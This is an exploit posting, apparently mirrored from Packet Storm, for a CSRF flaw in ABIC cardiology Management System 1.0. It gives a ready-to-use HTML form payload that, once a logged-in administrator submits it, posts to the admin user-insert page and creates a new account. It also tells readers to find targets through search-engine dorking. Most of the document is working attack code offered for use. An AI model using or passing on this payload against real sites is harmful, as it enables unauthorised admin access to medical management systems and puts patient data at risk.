Share
## https://sploitus.com/exploit?id=PACKETSTORM:180248
=============================================================================================================================================  
| # Title : ABIC cardiology Management System 1.0 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |  
| # Vendor : https://abicegypt.com/ |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] Line 7 : Set your target url  
  
[+] save payload as poc.html   
  
[+] payload :   
  
<div class="panel panel-default panel-table">  
<div class="panel-heading"> <h2 class="text-center">New User </h2>  
</div>  
<div class="panel-body">  
<div class="col-md-offset-2 col-md-8">  
  
<form action="https://127.0.0.1.com/eg-admin/users/insert.php?" method="post" enctype="multipart/form-data" name="form1" id="form1">  
  
<div class="form-group"> User Name  
<input type="text" name="username" class="form-control" placeholder="Insert User Name">  
</div>  
<div class="form-group"> Password  
<input type="text" name="password" class="form-control" placeholder="Insert Password">  
</div>  
  
<div class="col-xs-12">  
<button type="submit" class="btn btn-primary btn-xl" name="add"> SAVE </button>  
</div>  
<input type="hidden" name="MM_insert" value="form1">  
</form>  
  
</div>  
</div>  
</div>  
  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================